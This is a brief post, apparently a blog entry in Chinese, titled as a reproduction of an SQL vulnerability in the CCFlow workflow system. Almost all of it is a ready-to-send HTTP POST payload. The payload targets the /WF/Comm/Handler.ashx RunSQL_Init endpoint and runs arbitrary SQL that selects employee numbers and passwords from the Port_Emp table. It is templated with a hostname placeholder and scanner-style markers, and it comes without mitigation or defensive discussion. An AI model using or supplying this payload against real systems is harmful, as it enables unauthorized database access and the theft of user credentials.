Babing
Published on 2024-08-30 / 1 Visits
0
0

C19-1驰骋-CCFlow-SQL

C19-1驰骋-CCFlow-SQL

漏洞复现:

payload:

POST /WF/Comm/Handler.ashx?§DoType=RunSQL_Init§ HTTP/1.1
      Host: {{Hostname}}
      Accept: application/json, text/plain, */*
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Connection: keep-alive
      §Content-Type: multipart/form-data; boundary=----123128312312389898yd98ays98d
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

      ------123128312312389898yd98ays98d
      Content-Disposition: form-data; name="SQL"

      SELECT No,Pass FROM Port_Emp
      ------123128312312389898yd98ays98d--§

Comment